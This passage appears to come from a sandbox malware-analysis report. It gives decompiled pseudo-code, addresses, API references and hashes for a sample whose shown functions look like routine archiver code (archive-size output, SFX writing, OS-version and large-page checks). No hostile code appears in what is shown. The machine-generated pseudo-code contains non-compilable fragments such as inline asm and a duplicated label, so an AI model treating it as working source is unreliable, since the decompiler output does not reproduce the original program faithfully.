				void* _t67;

				_t61 = __edi;
				E0041F1B0(E00426980, _t67);
				_t65 = __ecx;
				_t47 = __ecx + 8;
				if( *((intOrPtr*)(__ecx + 0xac)) != 0) {
					E003EB5FA(_t47, __edi, 1);
				}
				if( *(_t65 + 0xb8) != 0) {
					_push(_t61);
					E003B2690(_t67 - 0x18);
					 *(_t67 - 4) =  *(_t67 - 4) & 0x00000000;
					asm("sbb ecx, [esi+0x11c]");
					E003EC1EA(_t67 - 0x18, "Files read from disk",  *((intOrPtr*)(_t65 + 0x18)) -  *((intOrPtr*)(_t65 + 0x118)),  *((intOrPtr*)(_t65 + 0x1c)));
					E003B2834();
					E003B284C(_t67 - 0x18, "Archive size: ");
					_t62 =  *((intOrPtr*)(_t67 + 8));
					E003E438A(_t67 - 0x18,  *_t62,  *((intOrPtr*)(_t62 + 4)));
					E003B2834();
					_t75 =  *((char*)(_t62 + 0xc));
					if( *((char*)(_t62 + 0xc)) != 0) {
						E003B284C(_t67 - 0x18, "Volumes: ");
						E003B28D3(_t67 - 0x18, _t62, _t67, _t75,  *((intOrPtr*)(_t62 + 8)));
						E003B2834();
					}
					E003B1FA0( *(_t65 + 0xb8));
					E003B1E40(fputs( *(_t67 - 0x18),  *( *(_t65 + 0xb8))),  *(_t67 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return 0;
			}








                                                                                                    0x003ec100
                                                                                                    0x003ec105
                                                                                                    0x003ec10e
                                                                                                    0x003ec117
                                                                                                    0x003ec11a
                                                                                                    0x003ec11e
                                                                                                    0x003ec11e
                                                                                                    0x003ec12a
                                                                                                    0x003ec130
                                                                                                    0x003ec134
                                                                                                    0x003ec13c
                                                                                                    0x003ec14e
                                                                                                    0x003ec159
                                                                                                    0x003ec161
                                                                                                    0x003ec16e
                                                                                                    0x003ec173
                                                                                                    0x003ec17e
                                                                                                    0x003ec186
                                                                                                    0x003ec18b
                                                                                                    0x003ec18f
                                                                                                    0x003ec199
                                                                                                    0x003ec1a4
                                                                                                    0x003ec1ac
                                                                                                    0x003ec1ac
                                                                                                    0x003ec1b7
                                                                                                    0x003ec1d0
                                                                                                    0x003ec1d8
                                                                                                    0x003ec1df
                                                                                                    0x003ec1e7

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$H_prolog
                                                                                                    • String ID: Archive size: $Files read from disk$Volumes:
                                                                                                    • API String ID: 2614055831-73833580
                                                                                                    • Opcode ID: be11ee4c184f5066e9fc7ac6406c418f7f2dfeb1da710987426e3157cab1fc6d
                                                                                                    • Instruction ID: 9fe1a75c141444e009e4790884606bd36e4a426d7df072b072e094c6f36d78de
                                                                                                    • Opcode Fuzzy Hash: be11ee4c184f5066e9fc7ac6406c418f7f2dfeb1da710987426e3157cab1fc6d
                                                                                                    • Instruction Fuzzy Hash: 3C217132510115DBCB1AEB61D852FEFFBB4AF14304F404229A606564E1DB74699ACF80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EA6F9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 93%
                                                                                                    			E003EA6F9(intOrPtr* __ecx, struct _IO_FILE** __edx) {
				void* _t18;
				void* _t25;
				struct _IO_FILE** _t28;
				signed int _t45;
				intOrPtr* _t48;
				void* _t50;

				E0041F1B0(E0042672C, _t50);
				_t48 = __ecx;
				_t45 = 0;
				_t28 = __edx;
				_t55 =  *((intOrPtr*)(__ecx + 4));
				if( *((intOrPtr*)(__ecx + 4)) > 0) {
					do {
						E003B210C( *((intOrPtr*)( *__ecx + _t45 * 4)));
						fputs(" : ",  *__edx);
						_push( *((intOrPtr*)(E003B557F(_t50 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t48 + 0xc)) + _t45 * 4)), _t55))));
						 *(_t50 - 4) =  *(_t50 - 4) & 0x00000000;
						_t25 = E003B1FA0(L003B1FB3(_t28, _t55));
						 *(_t50 - 4) =  *(_t50 - 4) | 0xffffffff;
						E003B1E40(_t25,  *((intOrPtr*)(_t50 - 0x18)));
						_t45 = _t45 + 1;
					} while (_t45 <  *((intOrPtr*)(_t48 + 4)));
				}
				fputs("----------------",  *_t28);
				_t18 = E003B1FA0(_t28);
				 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0xc));
				return _t18;
			}









                                                                                                    0x003ea6fe
                                                                                                    0x003ea709
                                                                                                    0x003ea70b
                                                                                                    0x003ea70d
                                                                                                    0x003ea70f
                                                                                                    0x003ea712
                                                                                                    0x003ea714
                                                                                                    0x003ea71b
                                                                                                    0x003ea727
                                                                                                    0x003ea73d
                                                                                                    0x003ea73f
                                                                                                    0x003ea74c
                                                                                                    0x003ea751
                                                                                                    0x003ea758
                                                                                                    0x003ea75d
                                                                                                    0x003ea75f
                                                                                                    0x003ea714
                                                                                                    0x003ea76b
                                                                                                    0x003ea775
                                                                                                    0x003ea780
                                                                                                    0x003ea788

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003EA6FE
                                                                                                    • fputs.MSVCRT ref: 003EA727
                                                                                                      • Part of subcall function 003B557F: __EH_prolog.LIBCMT ref: 003B5584
                                                                                                      • Part of subcall function 003B1FB3: __EH_prolog.LIBCMT ref: 003B1FB8
                                                                                                      • Part of subcall function 003B1FA0: fputc.MSVCRT ref: 003B1FA7
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                    • fputs.MSVCRT ref: 003EA76B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$fputs$fputcfree
                                                                                                    • String ID: : $----------------
                                                                                                    • API String ID: 1877784702-4071417161
                                                                                                    • Opcode ID: 53c021969233c4f92fe5d10d173f7b02afd55b583662c4314dbf5474e95e31e6
                                                                                                    • Instruction ID: a83e4fca456cebbea677aae5d9cb786ee31edb5604f5b868760e611ea3282658
                                                                                                    • Opcode Fuzzy Hash: 53c021969233c4f92fe5d10d173f7b02afd55b583662c4314dbf5474e95e31e6
                                                                                                    • Instruction Fuzzy Hash: E201C831B00510DFCB19AF65E856AAEBBB2EF84354F50423EF116976D1CF356C04CA54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EC229 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 91%
                                                                                                    			E003EC229(void* __ecx, void* __edx) {
				struct _IO_FILE** _t16;
				void* _t41;
				void* _t44;

				E0041F1B0(E00426994, _t44);
				_t41 = __ecx;
				_t16 =  *(__ecx + 0xb8);
				_t49 = _t16;
				if(_t16 != 0) {
					fputs("Write SFX: ",  *_t16);
					_push( *((intOrPtr*)(_t44 + 8)));
					L003B1FB3( *(_t41 + 0xb8), _t49);
					E003B26B2(_t44 - 0x18, " : ");
					 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
					E003E438A(_t44 - 0x18,  *((intOrPtr*)(_t44 + 0xc)),  *((intOrPtr*)(_t44 + 0x10)));
					fputs( *(_t44 - 0x18),  *( *(_t41 + 0xb8)));
					E003B1E40(E003B1FA0( *(_t41 + 0xb8)),  *(_t44 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
				return 0;
			}






                                                                                                    0x003ec22e
                                                                                                    0x003ec237
                                                                                                    0x003ec239
                                                                                                    0x003ec23f
                                                                                                    0x003ec241
                                                                                                    0x003ec251
                                                                                                    0x003ec255
                                                                                                    0x003ec25e
                                                                                                    0x003ec26b
                                                                                                    0x003ec273
                                                                                                    0x003ec27d
                                                                                                    0x003ec28d
                                                                                                    0x003ec29b
                                                                                                    0x003ec2a1
                                                                                                    0x003ec2a8
                                                                                                    0x003ec2b0

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003EC22E
                                                                                                    • fputs.MSVCRT ref: 003EC251
                                                                                                      • Part of subcall function 003B1FB3: __EH_prolog.LIBCMT ref: 003B1FB8
                                                                                                    • fputs.MSVCRT ref: 003EC28D
                                                                                                      • Part of subcall function 003B1FA0: fputc.MSVCRT ref: 003B1FA7
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prologfputs$fputcfree
                                                                                                    • String ID: : $Write SFX:
                                                                                                    • API String ID: 1941438168-2530961540
                                                                                                    • Opcode ID: b442c357fe50c5aa9dbddb37931660ad41cf337a083c3e457da31f4088476f85
                                                                                                    • Instruction ID: 6df8cd3d4fc4f7de561fd20b24d01786cfe58aad88bc6ea9a6eda45404825c31
                                                                                                    • Opcode Fuzzy Hash: b442c357fe50c5aa9dbddb37931660ad41cf337a083c3e457da31f4088476f85
                                                                                                    • Instruction Fuzzy Hash: 0A01DF32614204AFCB06AFA5EC02BEEBBB6EF44310F50802AF505A60E0CF706D55CB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B906F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 68%
                                                                                                    			E003B906F() {
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t9;
				void* _t13;

				_t7 = GetModuleHandleW(L"ntdll.dll");
				if(_t7 == 0) {
					L8:
					return 0;
				} else {
					_t9 = GetProcAddress(_t7, "RtlGetVersion");
					if(_t9 == 0) {
						goto L8;
					} else {
						 *_t9( &_v288);
						if(_v272 != 2 || _v280 + _v284 != 0xa || _v276 > 0x3fab && (_v276 >= 0x47ba || L0041F7F0() != 0)) {
							goto L8;
						} else {
							_t13 = 1;
							return _t13;
						}
					}
				}
			}











                                                                                                    0x003b907d
                                                                                                    0x003b9085
                                                                                                    0x003b90e2
                                                                                                    0x003b90e5
                                                                                                    0x003b9087
                                                                                                    0x003b908d
                                                                                                    0x003b9095
                                                                                                    0x00000000
                                                                                                    0x003b9097
                                                                                                    0x003b909e
                                                                                                    0x003b90a7
                                                                                                    0x00000000
                                                                                                    0x003b90dd
                                                                                                    0x003b90df
                                                                                                    0x003b90e1
                                                                                                    0x003b90e1
                                                                                                    0x003b90a7
                                                                                                    0x003b9095

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 003B907D
                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 003B908D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: RtlGetVersion$ntdll.dll$Net
                                                                                                    • API String ID: 1646373207-3435683380
                                                                                                    • Opcode ID: da5444cba6d4b9a797bfffd7bed00173ae02f4b9cd52ca0aa2751847ac85b8e3
                                                                                                    • Instruction ID: 3c6eeb84bda900ebfc909f31b41f2c7678738c0b9939cb13efadc58ac7c34c7e
                                                                                                    • Opcode Fuzzy Hash: da5444cba6d4b9a797bfffd7bed00173ae02f4b9cd52ca0aa2751847ac85b8e3
                                                                                                    • Instruction Fuzzy Hash: F6F06230F0061C5BDB367B359C077E572A46B1870CF5084A69715E1481DBB8CDC5C955
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003BA03F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 58%
                                                                                                    			E003BA03F(void* __ecx) {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				void* _t7;

				_t7 = __ecx;
				_t1 = GetModuleHandleW(L"ntdll.dll");
				if(_t1 == 0) {
					L2:
					return 0;
				} else {
					_t3 = GetProcAddress(_t1, "RtlGetVersion");
					if(_t3 != 0) {
						 *_t3(_t7);
						_t5 = 1;
						return _t5;
					} else {
						goto L2;
					}
				}
			}







                                                                                                    0x003ba040
                                                                                                    0x003ba047
                                                                                                    0x003ba04f
                                                                                                    0x003ba061
                                                                                                    0x003ba064
                                                                                                    0x003ba051
                                                                                                    0x003ba057
                                                                                                    0x003ba05f
                                                                                                    0x003ba066
                                                                                                    0x003ba06a
                                                                                                    0x003ba06c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ba05f

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,003B9F3B,00000001), ref: 003BA047
                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 003BA057
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: RtlGetVersion$ntdll.dll$Net
                                                                                                    • API String ID: 1646373207-3435683380
                                                                                                    • Opcode ID: 32a2a0539453b19b817cd46afe3d9feab7eb3c88f1b37f4d7c9607ca191a4f9b
                                                                                                    • Instruction ID: 7c969d9770a91f60576107e45e767264b2a0aa0b115b71563e731d0a51636b55
                                                                                                    • Opcode Fuzzy Hash: 32a2a0539453b19b817cd46afe3d9feab7eb3c88f1b37f4d7c9607ca191a4f9b
                                                                                                    • Instruction Fuzzy Hash: 41D0C73275462139BA7566B97C0EBE6124C9B40B15F920467B500D3080DA989D82416A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B390 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 58%
                                                                                                    			E0040B390() {
				signed int _t4;

				_t4 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLargePageMinimum");
				if(_t4 != 0) {
					_t4 =  *_t4();
					if(_t4 != 0) {
						_t1 = _t4 - 1; // -1
						if((_t4 & _t1) == 0) {
							 *0x43a91c = _t4;
							return _t4;
						}
					}
				}
				return _t4;
			}




                                                                                                    0x0040b3a1
                                                                                                    0x0040b3a9
                                                                                                    0x0040b3ab
                                                                                                    0x0040b3af
                                                                                                    0x0040b3b1
                                                                                                    0x0040b3b6
                                                                                                    0x0040b3b8
                                                                                                    0x00000000
                                                                                                    0x0040b3b8
                                                                                                    0x0040b3b6
                                                                                                    0x0040b3af
                                                                                                    0x0040b3bd

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLargePageMinimum,003C0938), ref: 0040B39A
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0040B3A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: GetLargePageMinimum$kernel32.dll$Net
                                                                                                    • API String ID: 1646373207-831249193
                                                                                                    • Opcode ID: 2c609379cd441c6f0396b2e1ff20e2fcee75889fa31b1d6c1957332f560e455b
                                                                                                    • Instruction ID: cea7a1beec2046ac249b50a881ed18218316203f908e6b4100efc289debf6e36
                                                                                                    • Opcode Fuzzy Hash: 2c609379cd441c6f0396b2e1ff20e2fcee75889fa31b1d6c1957332f560e455b
                                                                                                    • Instruction Fuzzy Hash: 8DD0C7B0741313A6DB249BB29C2EF2A35649D107017911436A911E21D4DF38C515CB6D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00416460 Relevance: 7.8, APIs: 6, Instructions: 301COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 97%
                                                                                                    			E00416460(void* __eflags) {
				signed int _t140;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int* _t151;
				signed int _t153;
				signed int _t155;
				signed int* _t161;
				intOrPtr _t167;
				signed int _t172;
				intOrPtr _t178;
				signed int _t183;
				intOrPtr _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t204;
				intOrPtr _t212;
				intOrPtr _t215;
				intOrPtr _t225;
				signed int _t234;
				struct _CRITICAL_SECTION* _t235;
				intOrPtr* _t237;
				signed int _t238;
				signed int _t239;
				intOrPtr _t240;
				void* _t242;
				void* _t268;

				_t189 =  *(_t242 + 0x28);
				_t237 =  *_t189;
				_t238 = 0;
				 *((intOrPtr*)(_t242 + 0x2c)) = 0;
				 *((intOrPtr*)(_t242 + 0x1c)) = _t237 + 0x30;
				if(L00417E00( *((intOrPtr*)(_t237 + 0x30))) != 0) {
					L68:
					return 0xc;
				} else {
					while( *(_t237 + 0x38) == 0) {
						_t234 = E00416D10(_t237 + 0x208);
						 *((intOrPtr*)(_t242 + 0x14)) = 0;
						 *((intOrPtr*)(_t242 + 0x24)) = 0;
						 *(_t242 + 0x10) = 1;
						if(_t234 == 0) {
							_t212 =  *_t237;
							 *((intOrPtr*)(_t242 + 0x14)) = _t212;
							if( *((intOrPtr*)(_t237 + 0x10)) == 0) {
								_t189 =  *(_t237 + 0x18);
								_t240 =  *((intOrPtr*)(_t237 + 0xb0));
								_t225 =  *((intOrPtr*)(_t237 + 0xb4));
								_t178 = _t189 - _t240;
								if(_t212 > _t178) {
									_t212 = _t178;
									 *((intOrPtr*)(_t242 + 0x14)) = _t212;
								}
								_t238 = _t240 + _t212;
								asm("adc edx, 0x0");
								 *((intOrPtr*)(_t242 + 0x24)) =  *((intOrPtr*)(_t237 + 0x14)) + _t240;
								 *((intOrPtr*)(_t242 + 0x2c)) = _t225;
								 *((intOrPtr*)(_t237 + 0xb0)) = _t238;
								 *((intOrPtr*)(_t237 + 0xb4)) = _t225;
								 *(_t242 + 0x10) = 0 | _t189 == _t238;
							} else {
								if( *((intOrPtr*)(_t189 + 0xc)) != 0) {
									L9:
									_t183 = E0040B090( *((intOrPtr*)(_t237 + 0x10)),  *((intOrPtr*)(_t189 + 0xc)), _t242 + 0x14);
									_t215 =  *((intOrPtr*)(_t242 + 0x14));
									_t234 = _t183;
									_t238 = _t215 +  *((intOrPtr*)(_t237 + 0xb0));
									asm("adc eax, [esi+0xb4]");
									 *((intOrPtr*)(_t237 + 0xb0)) = _t238;
									 *((intOrPtr*)(_t242 + 0x2c)) = 0;
									 *((intOrPtr*)(_t237 + 0xb4)) = 0;
									if(_t234 == 0) {
										 *(_t242 + 0x10) = 0 | _t215 !=  *_t237;
									} else {
										goto L10;
									}
								} else {
									_t188 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x20))))))();
									 *((intOrPtr*)(_t189 + 0xc)) = _t188;
									if(_t188 != 0) {
										goto L9;
									} else {
										_t17 = _t188 + 2; // 0x2
										_t234 = _t17;
										L10:
										 *(_t237 + 0x3c) = _t234;
										E00416D30(_t237 + 0x208, _t234);
									}
								}
							}
						}
						 *(_t242 + 0x20) = 0;
						if(L00417E00( *((intOrPtr*)(_t237 + 0x34))) != 0) {
							 *(_t242 + 0x20) = 0xc;
							if(_t234 == 0) {
								_t234 = 0xc;
							}
						}
						_t146 =  *(_t237 + 0xa8);
						 *(_t242 + 0x18) = _t146;
						_t147 = _t146 + 1;
						 *(_t237 + 0xa8) = _t147;
						if(_t147 >=  *((intOrPtr*)(_t237 + 0xa4))) {
							 *(_t237 + 0xa8) = 0;
						}
						_t190 = _t189 | 0xffffffff;
						if(_t234 != 0) {
							L29:
							 *(_t242 + 0x10) = 1;
							goto L30;
						} else {
							_t172 = E00416D10(_t237 + 0x208);
							_t234 = _t172;
							if(_t234 != 0) {
								goto L29;
							} else {
								if( *(_t242 + 0x10) != _t172) {
									L30:
									 *(_t237 + 0x38) = 1;
								} else {
									_t173 =  *(_t237 + 0xa0);
									if( *(_t237 + 0xa0) <  *((intOrPtr*)(_t237 + 0x9c)) && ( *((intOrPtr*)(_t237 + 8)) != _t238 ||  *((intOrPtr*)(_t237 + 0xc)) !=  *((intOrPtr*)(_t242 + 0x2c)))) {
										_t234 = E00416A00(_t237 + 0x5c8 + (_t173 + _t173 * 2) * 8);
										if(_t234 != 0) {
											E00416D30(_t237 + 0x208, _t234);
											goto L29;
										} else {
											 *(_t237 + 0xa0) =  *(_t237 + 0xa0) + 1;
										}
									}
								}
							}
						}
						if(L00417F20( *((intOrPtr*)(_t242 + 0x1c))) != 0) {
							goto L68;
						} else {
							_t149 =  *(_t242 + 0x20);
							if(_t149 != 0) {
								return _t149;
							} else {
								if(_t234 == 0) {
									_t235 = _t237 + 0xb8;
									EnterCriticalSection(_t235);
									_t190 =  *(_t237 + 0xd0);
									 *(_t237 + 0xd0) =  *(_t237 + 0xd4 + _t190 * 4);
									LeaveCriticalSection(_t235);
									if( *((intOrPtr*)(_t237 + 0x10)) == 0) {
										_t167 =  *((intOrPtr*)(_t242 + 0x24));
									} else {
										_t167 =  *((intOrPtr*)( *(_t242 + 0x34) + 0xc));
									}
									_t234 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x24))))))(_t190, _t167,  *((intOrPtr*)(_t242 + 0x14)),  *(_t242 + 0x10));
									if(_t234 != 0) {
										E00416D30(_t237 + 0x208, _t234);
									}
								}
								_t151 = _t237 + 0x238 + ( *(_t242 + 0x18) +  *(_t242 + 0x18) * 2) * 4;
								 *_t151 = _t234;
								_t151[1] = _t190;
								_t151[2] =  *(_t242 + 0x10);
								EnterCriticalSection(_t237 + 0xb8);
								_t239 =  *(_t237 + 0x48);
								_t153 =  *(_t242 + 0x18);
								if(_t239 != _t153) {
									 *((char*)(_t153 + _t237 + 0x4c)) = 1;
								} else {
									 *(_t237 + 0x48) = 0xffffffff;
								}
								LeaveCriticalSection(_t237 + 0xb8);
								if(_t239 ==  *(_t242 + 0x18)) {
									_t155 =  *(_t237 + 0x44);
									if(_t155 != 0) {
										_t234 = _t155;
									}
									L47:
									L47:
									if(_t234 == 0 && _t190 != 0xffffffff) {
										_t234 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x24)) + 4))))();
										if(_t234 != 0) {
											 *(_t237 + 0x44) = _t234;
											E00416D30(_t237 + 0x208, _t234);
										}
									}
									_t239 = _t239 + 1;
									if(_t239 >=  *((intOrPtr*)(_t237 + 0xa4))) {
										_t239 = 0;
									}
									EnterCriticalSection(_t237 + 0xb8);
									if(_t190 != 0xffffffff) {
										 *(_t237 + 0xd4 + _t190 * 4) =  *(_t237 + 0xd0);
										 *(_t237 + 0xd0) = _t190;
									}
									_t191 =  *(_t237 + _t239 + 0x4c) & 0x000000ff;
									if(_t191 == 0) {
										 *(_t237 + 0x48) = _t239;
									} else {
										 *(_t237 + _t239 + 0x4c) = 0;
									}
									LeaveCriticalSection(_t237 + 0xb8);
									if(E00418050(_t237 + 0x34) != 0) {
										goto L68;
									}
									if(_t191 == 0) {
										if( *(_t242 + 0x10) != 0) {
											goto L70;
										}
										goto L66;
									} else {
										_t161 = _t237 + 0x238 + (_t239 + _t239 * 2) * 4;
										if(_t234 == 0) {
											_t204 =  *_t161;
											if(_t204 != 0) {
												_t234 = _t204;
											}
										}
										_t190 = _t161[1];
										 *(_t242 + 0x10) = _t161[2];
										goto L47;
									}
								} else {
									if(_t234 != 0) {
										L70:
										return 0;
									}
									_t268 =  *(_t242 + 0x10) - _t234;
									L66:
									if(_t268 != 0) {
										goto L70;
									}
									_t238 = 0;
									 *((intOrPtr*)(_t242 + 0x2c)) = 0;
									if(L00417E00( *((intOrPtr*)( *((intOrPtr*)(_t242 + 0x1c))))) == 0) {
										_t189 =  *(_t242 + 0x34);
										continue;
									} else {
										goto L68;
									}
								}
							}
						}
						goto L72;
					}
					_t140 = L00417F20( *((intOrPtr*)(_t242 + 0x1c)));
					asm("sbb eax, eax");
					return  ~_t140 & 0x0000000c;
				}
				L72:
			}































                                                                                                    0x00416464
                                                                                                    0x0041646a
                                                                                                    0x00416472
                                                                                                    0x00416475
                                                                                                    0x00416479
                                                                                                    0x00416484
                                                                                                    0x00416819
                                                                                                    0x00416822
                                                                                                    0x0041648a
                                                                                                    0x00416494
                                                                                                    0x004164a9
                                                                                                    0x004164ad
                                                                                                    0x004164b1
                                                                                                    0x004164b5
                                                                                                    0x004164bf
                                                                                                    0x004164c5
                                                                                                    0x004164c7
                                                                                                    0x004164ce
                                                                                                    0x00416545
                                                                                                    0x00416548
                                                                                                    0x0041654e
                                                                                                    0x00416556
                                                                                                    0x0041655a
                                                                                                    0x0041655c
                                                                                                    0x0041655e
                                                                                                    0x0041655e
                                                                                                    0x00416567
                                                                                                    0x00416569
                                                                                                    0x0041656c
                                                                                                    0x00416577
                                                                                                    0x0041657b
                                                                                                    0x00416581
                                                                                                    0x00416587
                                                                                                    0x004164d0
                                                                                                    0x004164d3
                                                                                                    0x004164ec
                                                                                                    0x004164f7
                                                                                                    0x004164fc
                                                                                                    0x00416500
                                                                                                    0x00416506
                                                                                                    0x0041650c
                                                                                                    0x00416512
                                                                                                    0x00416518
                                                                                                    0x0041651c
                                                                                                    0x00416524
                                                                                                    0x0041653f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004164d5
